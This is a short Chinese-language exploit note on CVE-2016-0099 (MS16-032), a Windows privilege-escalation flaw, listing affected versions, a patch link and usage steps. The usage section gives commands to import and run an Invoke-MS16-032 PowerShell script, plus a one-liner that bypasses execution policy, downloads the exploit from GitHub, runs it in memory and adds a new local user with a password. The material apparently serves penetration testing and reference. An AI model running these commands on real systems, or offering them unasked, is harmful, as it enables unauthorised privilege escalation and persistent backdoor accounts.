CVE-2016-0099
描述
此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行
影响版本
Product | Version | Update | Edition | Tested |
---|---|---|---|---|
Windows 10 | - | |||
Windows 10 | 1511 | |||
Windows 7 | - | SP1 | :heavy_check_mark: | |
Windows 8.1 | - | |||
Windows Rt 8.1 | - | |||
Windows Server 2008 | SP2 | :heavy_check_mark: | ||
Windows Server 2008 | R2 | SP1 | :heavy_check_mark: | |
Windows Server 2012 | - | |||
Windows Server 2012 | R2 | |||
Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0099
利用方式
目标系统需要有2个以上的CPU核心
PS脚本测试,在Windows server 2008 R2 sp1 x64执行下面命令
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
还能远程添加账户
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user ascotbe test6666 /add'"
GIF图如下
利用exe文件测试通杀x64和x86的所有版本,这边只录制Windows 7 sp1 x64版本的